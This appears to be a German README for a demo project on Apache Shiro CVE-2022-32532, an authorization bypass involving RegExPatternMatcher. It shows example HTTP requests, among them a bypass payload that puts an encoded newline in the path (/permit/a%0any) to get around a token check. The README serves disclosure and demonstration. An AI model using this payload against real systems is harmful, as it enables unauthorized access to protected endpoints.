
Apache Shiro CVE-2022-32532
Dies ist ein Demo-Projekt, das nur eine der Bedingungen zur Ausnutzung dieser Schwachstelle (CVE-2022-32532) zeigt.
Tatsächlich gibt es weitere Möglichkeiten, sie auszunutzen: Solange Entwickler RegExPatternMatcher verwenden, besteht eine mögliche Bypass-Schwachstelle.
Bei der aktuellen Konfiguration ist eine Überprüfung des Token-Request-Headers erforderlich, andernfalls hast du keine Berechtigung, auf die Schnittstelle unter /permit zuzugreifen.
Diese Anfrage kann erfolgreich sein
GET /permit/any HTTP/1.1
Token: 4ra1n
Der Zugriff ist nicht erlaubt, wenn kein Token-Request-Header vorhanden ist
GET /permit/any HTTP/1.1
In speziellen, aber häufigen Konfigurationen kann dies auf einfache Weise umgangen werden
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
Diese Schwachstelle ähnelt Spring-Security CVE-2022-22978
Dank an bdemers (Apache Shiro PMC) und chybeta (Sicherheitsforscher)